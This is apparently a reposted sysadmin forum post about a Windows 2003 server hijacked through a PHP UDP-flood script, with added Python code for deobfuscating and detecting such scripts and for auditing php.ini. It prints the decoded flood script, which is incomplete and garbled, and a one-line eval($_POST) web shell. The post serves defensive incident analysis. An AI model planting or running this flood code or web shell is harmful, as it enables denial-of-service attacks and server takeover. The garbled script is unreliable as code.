Win2003 suffering from UDP attacks that consume almost all of the bandwidth (Win server)

Source: Internet
Author: User
Tags: eval, rand
Later I found an encrypted (obfuscated) file on a website. After decrypting it I saw the familiar UDP code; could it be related? Sure enough, other people have run into the same situation, so it seems that blocking outbound UDP is very necessary.

The following is a reprint:

About the UDP attacks recently observed on our servers
Recently one or two of my servers have been showing frequent UDP attacks.
They drive the server's bandwidth usage to 100%. Checking the traffic usage with the Chinese Shield tool could not show exactly which site was being attacked. At first I thought it was a CC attack, because stopping IIS brought the bandwidth down to 0, but that was actually not the case: it was caused by one user's site having been compromised.
Now I'd like to say a little about the intrusion.
The original code of a PHP page in the user's program:
eval(gzinflate(base64_decode('
The code after N rounds of decryption is as follows:

$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time + $exec_time;

for ($i = 0; $i < 65535; $i++) {
$out .= "X";
while (1) {
$packets++;
if (time() > $max_time) {
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets*65)/1024, 2) . " mB Packets G " . round($packets/$exec_time, 2) . " PACKETS/S \n";
<?php eval($_POST[ddos])?>
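The "N rounds of decryption" mentioned above can be done statically, without ever executing the file. The following is an added example (my own code, not part of the reprinted post): it peels nested eval(gzinflate(base64_decode())) layers with the Python standard library and then reports which of the indicators visible in the decoded script are present (the udp:// fsockopen call, eval of request input, set_time_limit(0) and ignore_user_abort). The sample file is constructed inside the code from the indicator lines above with the flood loop left out, and all function and indicator names are my own.

```python
from __future__ import annotations

import base64
import re
import zlib

# The wrapper the post describes: eval(gzinflate(base64_decode('...')));
# Whitespace is tolerated and the base64 payload is captured.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)\s*;?",
    re.IGNORECASE,
)

# Static indicators taken from the decoded script above (the names are mine).
INDICATORS = {
    "udp_socket": re.compile(r"fsockopen\s*\(\s*['\"]udp://", re.I),
    "eval_of_request_input": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "unlimited_runtime": re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I),
    "ignore_user_abort": re.compile(r"ignore_user_abort\s*\(", re.I),
}


def peel_layers(source: str, max_layers: int = 50) -> tuple[str, int]:
    """Unwrap nested eval(gzinflate(base64_decode())) layers without executing anything.

    Each layer is reversed with the standard library: base64, then raw deflate
    (wbits=-15 is the format PHP's gzinflate expects). The decoded text replaces
    the wrapper in place, so any code around it is kept. Returns (source, layers)."""
    current, layers = source, 0
    while layers < max_layers:
        m = WRAPPER.search(current)
        if m is None:
            break
        payload = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
        decoded = zlib.decompress(payload, -15).decode("utf-8", "replace")
        current = current[:m.start()] + decoded + current[m.end():]
        layers += 1
    return current, layers


def find_indicators(php_source: str) -> list[str]:
    """Peel the obfuscation, then list which flood/backdoor indicators appear."""
    decoded, layers = peel_layers(php_source)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if layers:
        hits.insert(0, f"obfuscation_layers:{layers}")
    return hits


def wrap_layers(php_code: str, layers: int) -> str:
    """Constructed test fixture: builds the same nested wrapper around php_code.

    Inner layers carry no <?php tag, because eval()'d code must not; only the
    outermost file does."""
    current = php_code
    for _ in range(layers):
        comp = zlib.compressobj(level=9, wbits=-15)  # raw deflate, like gzdeflate()
        raw = comp.compress(current.encode("utf-8")) + comp.flush()
        current = f"eval(gzinflate(base64_decode('{base64.b64encode(raw).decode()}')));"
    return f"<?php {current} ?>"


# Constructed sample: the indicator lines from the decoded script above, with
# the flood loop left out, wrapped three times like the file the post found.
SAMPLE_INNER = (
    "$ip = $_GET['ip']; $rand = $_GET['port'];\n"
    "set_time_limit(0); ignore_user_abort(FALSE);\n"
    "$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);\n"
    "eval($_POST['ddos']);"
)
SAMPLE_FILE = wrap_layers(SAMPLE_INNER, 3)
CLEAN_FILE = "<?php echo 'hello'; ?>"

if __name__ == "__main__":
    src, n = peel_layers(SAMPLE_FILE)
    print(f"{n} layers removed; decoded source:\n{src}")
    print("indicators:", find_indicators(SAMPLE_FILE))
    print("clean file indicators:", find_indicators(CLEAN_FILE))
```

Run over a web root, the same two functions give a quick triage list: any file that needs more than zero layers peeled or that matches the udp_socket or eval_of_request_input indicator deserves a manual look, and the decoded text can be kept as evidence without the obfuscated file ever being executed.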

A quick Baidu search gives the working principle:
The code is first placed in a normal web page.
The target IP and port are passed to that page in the URL, and the page then sends UDP packets to that address.
So the server got hit and became the source of the attack.
That is, the server shows UDP attacks and bandwidth consumption is very heavy, basically 100%, generally hovering between 97% and 99%.
Restrict PHP's network access in php.ini.
Set the following value to Off in php.ini:
allow_url_fopen = Off
;extension=php_sockets.dll
The semicolon at the front must be present; it disables loading of php_sockets.dll.
Then restart IIS.
I did not disable this function myself, since some programs seem to need it; instead I blocked the outbound UDP ports directly.
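To check whether a php.ini already has the two changes described above, here is an added example (my own code, not from the post) that reads the file the way PHP does for these lines, with ';' as the comment marker and directive names case-insensitive, and reports what still needs changing. The ini fragments at the bottom are constructed for the example; the function names are mine. Extension names are normalised so the newer spelling extension=sockets is caught as well.

```python
from __future__ import annotations

import re

# Values php.ini treats as "off" for boolean directives.
OFF_VALUES = {"off", "0", "false", "no", "none", ""}


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader.

    Returns the active directives, the set of loaded extensions, and the set of
    extensions that are present but commented out with ';'. Extension names are
    normalised (php_sockets.dll -> sockets)."""
    directives: dict[str, str] = {}
    loaded: set[str] = set()
    disabled: set[str] = set()

    def ext_name(value: str) -> str:
        return re.sub(r"^php_|\.dll$", "", value.strip().strip('"').lower())

    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue  # blank line or [section] header
        commented = line.startswith(";")
        if commented:
            line = line.lstrip(";").strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        value = value.split(";", 1)[0].strip().strip('"')  # drop a trailing comment
        if key == "extension":
            (disabled if commented else loaded).add(ext_name(value))
        elif not commented:
            directives[key] = value
    return {"directives": directives, "loaded": loaded, "disabled": disabled}


def audit_php_ini(text: str) -> list[str]:
    """Report the two settings the post changes; an empty list means both are done."""
    cfg = parse_php_ini(text)
    findings: list[str] = []
    # PHP's built-in default for allow_url_fopen is On, so a missing line counts as On.
    if cfg["directives"].get("allow_url_fopen", "on").lower() not in OFF_VALUES:
        findings.append("allow_url_fopen is On: set 'allow_url_fopen = Off'")
    if "sockets" in cfg["loaded"]:
        findings.append("sockets extension is loaded: comment it out as ';extension=php_sockets.dll'")
    return findings


# Constructed fragments: the configuration before and after the post's changes.
WEAK_INI = """
[PHP]
allow_url_fopen = On
extension=php_mbstring.dll
extension=php_sockets.dll ; loaded on the compromised server
"""

HARDENED_INI = """
[PHP]
allow_url_fopen = Off
extension=php_mbstring.dll
;extension=php_sockets.dll
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, "->", audit_php_ini(ini) or ["ok"])
```

One caveat worth knowing when relying on these two settings: fsockopen() is a core PHP function, so it works without the sockets extension and is not governed by allow_url_fopen (which controls URL-aware fopen wrappers such as file_get_contents). The author's final step, blocking outbound UDP at the firewall, is therefore the change that actually stops this script's traffic; the php.ini changes reduce what other scripts can do but are not sufficient on their own.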
